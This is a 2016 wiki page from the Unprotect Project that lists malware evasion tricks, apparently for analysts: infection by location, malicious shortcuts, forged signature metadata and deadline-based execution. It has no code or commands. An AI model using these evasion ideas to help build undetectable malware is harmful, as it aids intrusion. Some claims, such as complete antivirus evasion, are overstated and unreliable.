Exotic Tricks

From Unprotect Project
Revision as of 15:24, 30 December 2016 by Admin (talk | contribs) (References)

Jump to: navigation, search

Technique Description

Techniques

Below is a list of all the exotic tricks in Unprotect Project:

Exotic Tricks
Techniques Description
Infect by localisation Some Malware infects machine by localisation. Some governments protect malicious activities unless the targets are in the country.
Malicious Shortcut A Windows shortcut can stored some code to download an additional file or store the malicious file directly into the shortcut. This makes the malicious application fully undetectable by any antivirus.
Fake signature Every exe file contain metadata that allow users to trust the third party that distribute the program. Malware are able to usurp the metadata in order to fool the user but also the security tools.
Deadline infection Attacks can be performed during a limited time. To avoid detection some malware contain an deadline date. Once the date is reached the malware do not run anymore. Malware analyst have to change the time of the machine to run the file. This technique can also defeat a sandbox if the date is already outdated.

References

https://www.phrozensoft.com/2016/12/shortcuts-as-entry-points-for-malware-poc-part-2-19
https://www.phrozensoft.com/2016/12/shortcuts-as-entry-points-for-malware-18
https://nakedsecurity.sophos.com/2016/12/13/nymaim-using-mac-addresses-to-uncover-virtual-environments-and-bypass-antivirus/